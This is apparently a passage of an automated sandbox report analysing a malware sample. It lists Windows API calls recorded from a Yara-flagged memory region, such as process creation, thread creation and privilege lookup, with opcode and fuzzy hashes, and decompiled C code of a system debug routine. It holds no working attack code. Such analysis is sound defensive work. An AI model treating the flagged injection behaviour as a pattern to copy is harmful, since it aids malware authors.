                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID: .z`
                                                      • API String ID: 3298025750-1441809116
                                                      • Opcode ID: 6a59504d4e3b580197e0f7cceaea976dee2c66138c05c7347ccb5f4163336edb
                                                      • Instruction ID: 2e66b774a4df23d0c6dd46ab849c3757cd7d6fe5049118a703b10edd0918bbc7
                                                      • Opcode Fuzzy Hash: 6a59504d4e3b580197e0f7cceaea976dee2c66138c05c7347ccb5f4163336edb
                                                      • Instruction Fuzzy Hash: 8AD02BB81042845BDB10EF69E8C089B77D5BF803147108A4AFC9D47303C130D8198BB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0062834A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0062836B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: fbc16a511511f40714f8509eb2c391b8a4e9c1bf39cca2c802e3e3c43d4591e2
                                                      • Instruction ID: 006fdd4dab12c0513e359e694faca413e06d168b7ee816b62845aaa883d493c9
                                                      • Opcode Fuzzy Hash: fbc16a511511f40714f8509eb2c391b8a4e9c1bf39cca2c802e3e3c43d4591e2
                                                      • Instruction Fuzzy Hash: FD012D32A406347BE721A6949C43FFE776D6F51B10F144009FB04BB1C1D6D479054BE5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0062834A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0062836B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 29a892fc29f7ae1cc7dcf0d9980a4ef5a3648e613fbd5d957af854e8297cf94a
                                                      • Instruction ID: ba9708e2a2f8f2a32ad965e951e2d6dd933d78218ece722f44caaf5af9a5c9bc
                                                      • Opcode Fuzzy Hash: 29a892fc29f7ae1cc7dcf0d9980a4ef5a3648e613fbd5d957af854e8297cf94a
                                                      • Instruction Fuzzy Hash: D6018431A806287BE720A6959C03FFE776D6B40B51F044118FB04BA1C1EAD4790546EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0062834A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0062836B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: c0c426cb3ea28ce7e549d0049a8b3efb4b3a4d38edc75c75df3c0cdb56d1835f
                                                      • Instruction ID: 2500395dd35ea3c597911c46924a0590c10655e1f64116726f4b4e4cd7cf22c9
                                                      • Opcode Fuzzy Hash: c0c426cb3ea28ce7e549d0049a8b3efb4b3a4d38edc75c75df3c0cdb56d1835f
                                                      • Instruction Fuzzy Hash: D3F0FC31A41A393AE71076945C02FFE77596B40F21F154259FE04BB2C2E9D479050AE9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0062834A
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0062836B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: efa41587afe4398dddb1ab0705e8c48b63e135a456b523d24b96751b8ed50aa0
                                                      • Instruction ID: ef93e40c1b25d1f4b1860c4ea0ed96791798bc51ff6e6210c5b8bdf064343b56
                                                      • Opcode Fuzzy Hash: efa41587afe4398dddb1ab0705e8c48b63e135a456b523d24b96751b8ed50aa0
                                                      • Instruction Fuzzy Hash: 2BF0A731B81A343BE620A6D46C43FFE625E6B40F11F154119FF04FA2C1EAD579060AF9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0062AD32
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                      • Instruction ID: 3de8da144bbef9a5471b3ae65e0e5c61be99a8c126cec62ae5ab1be442d70c45
                                                      • Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
                                                      • Instruction Fuzzy Hash: D7015EB5E0020DABDB10DAE4EC42FDEB3B99B14308F004599B908A7241F671EB04CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0063A2F4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction ID: f0ad98d870bf0d57a3cdb3d1e77c461cc870edbd507e9ef5abf58053fb6315f9
                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction Fuzzy Hash: 2C01AFB2210108ABCB54DF89DC80EEB77AEAF8C754F158258BA0D97241C630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0063A2F4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 0a5e4659c1c7dea58745958aad34a6bf333a2b57697f7689caea92844f800d10
                                                      • Instruction ID: fdc2067854ecc54a5f8ca1c0b2130ab942d4cb73adde8109878957a6f61ea26f
                                                      • Opcode Fuzzy Hash: 0a5e4659c1c7dea58745958aad34a6bf333a2b57697f7689caea92844f800d10
                                                      • Instruction Fuzzy Hash: 6B01F2B2204148ABCB44DF98DC80DEB7BAAAF8C314F15825CFA9997201C630E841CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0062F010,?,?,00000000), ref: 00638DAC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 0492dd52497a697f2125d76e48c7ee170aee05726da811e9b98eccb8e968774a
                                                      • Instruction ID: 31a6176367a5b3cef598b33b0f688a0c9686716ace8805fc14616b6c16d7e43d
                                                      • Opcode Fuzzy Hash: 0492dd52497a697f2125d76e48c7ee170aee05726da811e9b98eccb8e968774a
                                                      • Instruction Fuzzy Hash: 5FE06D733803043AE3206599AC03FE7B29DDB91B21F55002AFA4DEB2C1D995F80142E8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0062F192,0062F192,?,00000000,?,?), ref: 0063A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6a70caa816748f34c8a883363f56eee37c47f43847ac3f6b63186bcd1e073914
                                                      • Instruction ID: c4c29aa9e2aac0719fa8aef3131309bfecf9ceaf4ee79a1c387b547e74ee7c1e
                                                      • Opcode Fuzzy Hash: 6a70caa816748f34c8a883363f56eee37c47f43847ac3f6b63186bcd1e073914
                                                      • Instruction Fuzzy Hash: 32E06DB1200218BBCA10EF99DC80EDB37AA9F84710F108565FA096B741C930E850CBF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0062F192,0062F192,?,00000000,?,?), ref: 0063A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction ID: 03b5c67a67dba3f686430b034ee0af2cb39890c76d60a6cd3f1ecba381bc8c07
                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF89DC85EE777ADAF88650F018155BA0957241C930E8108BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(006344F6,?,?,oLc,?,006344F6,?,?,?,?,?,00000000,00000000,?), ref: 0063A21D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: da5d9a1859da918cda5ff183b287d6725098659595e67a65e4b3d82815f626b6
                                                      • Instruction ID: 5e40bfd240eeba814e268dcef8d883289a2576db2b0ba7d9cd6e97d74330d396
                                                      • Opcode Fuzzy Hash: da5d9a1859da918cda5ff183b287d6725098659595e67a65e4b3d82815f626b6
                                                      • Instruction Fuzzy Hash: 46D012F52042449FD710EFA4E8918DB7756AF883147308549F89943702D735D92AAAF1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0062F192,0062F192,?,00000000,?,?), ref: 0063A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: d5f349ad2854dc30ac00c8f406a5ff6da6b15d06e944a748c7788ffefff8511d
                                                      • Instruction ID: 9119eca1dfd021b2341b5148288996ae22386158c58f550cbcbaefad78e0532d
                                                      • Opcode Fuzzy Hash: d5f349ad2854dc30ac00c8f406a5ff6da6b15d06e944a748c7788ffefff8511d
                                                      • Instruction Fuzzy Hash: 16E012B4104285EBCB10EF78EC91CEBBB6ADF852547158556F84987202C735D920DBF2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,00628CF4,?), ref: 0062F6BB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                      • Instruction ID: 4bd354006e8555a85de183f4627437006766e42cbba34c5b03a72d26528c95fb
                                                      • Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
                                                      • Instruction Fuzzy Hash: C2D05E726903042AE610ABA5DC03F667289AB44B00F490474F949AA3C3D950E4004565
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: f7a231309f01cca554ab19f31e417b517bc7148b892aa75f239cc27dab3ed7df
                                                      • Instruction ID: c829dec6b1facb23329ef080b9a75b5298e8169040eccf9415f3afbc76cdeeb8
                                                      • Opcode Fuzzy Hash: f7a231309f01cca554ab19f31e417b517bc7148b892aa75f239cc27dab3ed7df
                                                      • Instruction Fuzzy Hash: 8EB02BB18014C0C5FB01D7600608717394077C0300F17C511D2028390A0778D090F1B1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      C-Code - Quality: 53%
                                                      			E048EFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                      				void* _t7;
                                                      				intOrPtr _t9;
                                                      				intOrPtr _t10;
                                                      				intOrPtr* _t12;
                                                      				intOrPtr* _t13;
                                                      				intOrPtr _t14;
                                                      				intOrPtr* _t15;
                                                      
                                                      				_t13 = __edx;
                                                      				_push(_a4);
                                                      				_t14 =  *[fs:0x18];
                                                      				_t15 = _t12;
                                                      				_t7 = E0489CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                      				_push(_t13);
                                                      				E048E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                      				_t9 =  *_t15;
                                                      				if(_t9 == 0xffffffff) {
                                                      					_t10 = 0;
                                                      				} else {
                                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                      				}
                                                      				_push(_t10);
                                                      				_push(_t15);
                                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                      				return E048E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                      			}











                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048EFDFA
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048EFE2B
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048EFE01
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp, Offset: 04830000, based on PE: true
                                                      • Associated: 00000005.00000002.602371206.000000000494B000.00000040.00000001.sdmp
                                                      • Associated: 00000005.00000002.602383095.000000000494F000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                      • API String ID: 885266447-3903918235
                                                      • Opcode ID: e14a2aa8574ec12a2e9b3a2814ad0369bb20bfe4f91d6bdda5ff774a6b2fabb3
                                                      • Instruction ID: 106bff17824e3f7bf3f42ad1b06adf0257c65f46e6a9043d66bf3df10af75d40
                                                      • Opcode Fuzzy Hash: e14a2aa8574ec12a2e9b3a2814ad0369bb20bfe4f91d6bdda5ff774a6b2fabb3
                                                      • Instruction Fuzzy Hash: 63F0FC76604501BFE6201A86DC01F337B5ADB85774F140754F714965D1EAA2FC3097F5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%